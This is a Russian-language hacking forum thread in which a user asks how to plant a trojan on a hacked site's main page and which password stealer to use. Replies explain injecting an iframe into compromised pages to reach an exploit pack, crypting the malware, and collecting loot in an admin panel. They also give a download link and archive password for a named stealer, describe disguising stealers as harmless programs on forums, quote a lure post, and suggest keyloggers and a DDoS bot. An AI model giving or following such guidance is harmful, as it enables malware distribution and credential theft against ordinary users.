Как оставить троян на главной?

[Vladik]

Читал статьи "что можно сделать с шеллом" и наткнулся на что то вроде такого коментария : "в javascript сделай так что при входе на страницу автоматически загружался и открывался троян на компе у жертвы".
Подскажите пожалуйста какой Javascript код для этого нужен ?
И какой можете троян посоветовать для кражи паролей? Помню в 2005 году был пинч , я давно этим не интересовался сейчас все изменилось уже, какой хороший троян на сегодняшний день? (желательно бесплатный). Спасибо.

 

[Ollorin]

Даже затрудняюсь с ответом. Гугли на тему iframe и связки сплоитов.

 

[TrueUser]

Обычно на индекс ломанного сайта ставится тем или иным (тупо вставкой html кода или с помощью яваскрипта) образом iframe на связку эксплойтов. Что такое iframe трафик лучше почитать тут.
Что такое связка эксплойтов опять же читаем вот здесь.
Собственно в сам пак загружается уже зловред (тот же пинч, спай, ху..яй и пр).
У трояна обычно есть админка (которую тебе тоже надо установить), в ней будут собираться твои награбленные пароли. Зловреда надо перед использованием обычно криптовать.

 

[Ollorin]

да, про хики забыл.

 

[Vladik]

Спасибо за ответы , я поищю .

 

[KraZz]

Vladik пишет:
Помню в 2005 году был пинч ... какой хороший троян на сегодняшний день? (желательно бесплатный).

Сейчас в рунете самый популярный стилер - UFR_Stealer
v2.6.0.0:
http://vazonez.com/downloads/software/UFR_...f4b6a0204f4.rar
ПАРОЛЬ: vazonez

http://forum.xakep.ru/m_2147044/printable.htm
http://vazonez.com/forum/index.php?action=...tpage;topic=3.0
+ обязательно прочти справку по нему, там достаточно подробно описано, что нужно делать, как настраивать и т.д.
И стилеры "никто" через "трафф" не распространяет, обычно это делают так:
Заливают на говнообменник, типа как это сделано здесь http://rghost.ru/36137175
И потом на разных форумах, создают посты под видом безобидной программы (с описанием), к примеру, как это сделано здесь:
http://forum.xakep.ru/m_2597310/mpage_1/key_/tm.htm - Death-Mobile v0.1 | Flooder SMS {r00t.in}
И еще как вариант потом когда украдут достаточно акков с форумов, создают темы подвидом пользователей с репой, к примеру, как это сделано здесь:
http://exploit.in/forum/index.php?showtopic=55130 - Error Lookup 1.6 + Portable, Программа для получения информации об ош
там была размещено вот это:

[B]Error Lookup 1.6 + Portable[/B]
Программа для получения информации об ошибках в Windows: вводим код ошибки и получаем описание ошибки. 

[IMG]{http://content.foto.mail.ru/mail/marythunder/_blogs/i-7060.jpg[/IMG}]

Поддерживаемые коды ошибок: Windows - коды возвращаемые функцией GetLastError(), DirectX - коды возвращаемые функциями DirectX, NTSTATUS - коды возвращаемые функциями API режима ядра, WinInet - коды возвращаемые функциями библиотеки WinInet, Диспетчер устройств - коды которые сообщает диспетчер устройств, STOP - коды выдаваемые на синем экране смерти. 

[IMG]{http://content.foto.mail.ru/mail/marythunder/_blogs/i-7061.jpg[/IMG}]

Не загружать яндекс бар

[URL={http://www.fayloobmennik.net/1366326]скачать} программу[/URL]

Могут еще и положительные отзывы оставлять с других угнанных акков, чтобы народ доверял...
Но ты так не делай - не воруй у своих, хотя эти п#дарасы (типа /dev/null) и остались безнаказанными со стороны администрации, все-таки нужно соблюдать хотя бы простые правила моральной этики!
Кстати на exploit.in тоже была создана подобная тема про Death-Mobile v0.1, но, к сожалению, в разделе который не виден для не зарегистрированных пользователей (а я там не зареган по моральным убеждениям), да и вообще непонятно зачем было так сделано, прятать разделы - нонсенс - как хорошо, что у нас такого беспредела нет!
ЗЫ: Но хотя UFR_Stealer уже немного "морально" устарел, так как "не пиздит" пассы от свежего FF.. хотя через граббинг файлов можно самому поискать нужные файлы и "слить".. короче, все зависит от уровня знаний юзающего...
ЗЫЫ: а в DL xiki в первую очередь к описаниям дополнительно не хватает ссылок в конце контента на хорошие темы (например, как это сделано в wiki) - ИМХО

 

[Vladik]

KraZz , большое тебе спасибо за прогу , но она ворует пароли лишь от тех программ которые установлены на компе (такие как outlook, total commander) в котроых поставлена опция сохранять пароль , а те пароли что я на сайтах в интернете ввожу она не крадет (
Если я не ошибаюсь то раньше пинч воровал пароли и от сайтов в интернете (или от тех сайтов где я поставил галочку "сохранить пароль") . Сейчас уже нету такого троя ? Все дыры прикрыли ?

 

[higaru]

граббит он их, тебе же Краз сказал (ессно если в браузере врублена опция сохранять пароли).

 

[Vladik]

граббит он их, тебе же Краз сказал (ессно если в браузере врублена опция сохранять пароли).

Ок , я просто написал сообщение а потом только подумал об этом варианте. Просто я никогда не пользуюсь этой опцией из за таких случаев ) , поэтому у меня и не грабит. В любом случае спасибо за троя , я им воспользуюсь.

 

[KraZz]

Бля, вставлю пару словесных "пилюлей"

Vladik пишет:
Если я не ошибаюсь то раньше пинч воровал пароли и от сайтов в интернете (или от тех сайтов где я поставил галочку "сохранить пароль") .

Гы-гы, а ты думаешь UFR_Stealer умеет что-то другое делать %)))
ЗЫ: не тупи, епт..
Ты спросил - я тебе написал, что сейчас "ВСЕ" юзают вместо пинча, если ты не в состоянии изучить тему, которую тебе советуют (а потом уже задавать по делу вопросы) - тогда юзай пинч..
Хакинг - это явно не твоя тема, ты только просрешь пару лет жизни впустую - ИМХО
Лишний раз убеждаюсь, что давать советы на форуме - это бесполезная трата времени - ИМХО

Vladik пишет:
Просто я никогда не пользуюсь этой опцией из за таких случаев

Специально для таких как ты, изобрели "велосипед" (кейлоггер) с дополнительной опцией создания скриншотов
Еще можешь заюзать (если осилишь) ПОСЛЕДНЮЮ паблик версию бота optima Darkness (он тоже, помимо ддоса, "ворует пассы" (насколько я помню)) его как раз и можно массово распространять через "трафф"

ЗЫЫ: Вообще ты мне напоминаешь чела, который сначала опоражницца в штаны, потом думает, что надо посрать, а когда садится рядом с унитазом.. еще при этом пытаецца пожрать из чайника манную кашу с вареным сладким салом...

 

[Vladik]

Лишний раз убеждаюсь, что давать советы на форуме - это бесполезная трата времени - ИМХО

KraZz твой совет мне очень помог , и я послушал твоего совета , ведь без него я даже не знал бы где искать хороший трой на даный момент. И я очень благодарен тем кто помогает ведь без них очень тяжело будет продвинуться дальше , поэтому давать советы - это не пустая трата времени , а хороший поступок.

если ты не в состоянии изучить тему, которую тебе советуют (а потом уже задавать по делу вопросы) - тогда юзай пинч..

Здесь ты прав , на сайте у создателя троя пишется что ворует только те пароли которые сохранены в браузере , и я перепутал насчет пинча , когда я юзал пинч, на тот момент я сохранял свои пароли поэтому думал что пинч ворует все , просто запутался и поленился найти ответ сам ,чем засорил форум и вышло так что мне помогли советом а я еще всем недоволен , типо херово работает. Извени что так это выглядет , наоборот ты мне очень помог.

Хакинг - это явно не твоя тема, ты только просрешь пару лет жизни впустую - ИМХО

Уже поздно об этом говорить , я уже достаточно выучил чтобы бросать , темболее кроме компов меня мало что еще интересует и я хочу стать хакером чтобы знать о компах все. Но я еще и хочу зарабытывать деньги , так что я скорее всего поучусь сам чтобы мне было легко потом учиться и пойду работать программистом.

И еще раз спасибо за твой совет , ты мне очень помог.

 

[TrueUser]

<< ЗЫЫ: Вообще ты мне напоминаешь чела, который сначала опоражницца в штаны, потом думает, что надо посрать, а когда садится рядом с унитазом.. еще при этом пытаецца пожрать из чайника манную кашу с вареным сладким салом...

Мля, кразз я просто реально писался над вареным сладким салом ))) и откуда только появляются такие эпитеты в голове? Надеюсь не за счет практических наблюдений )))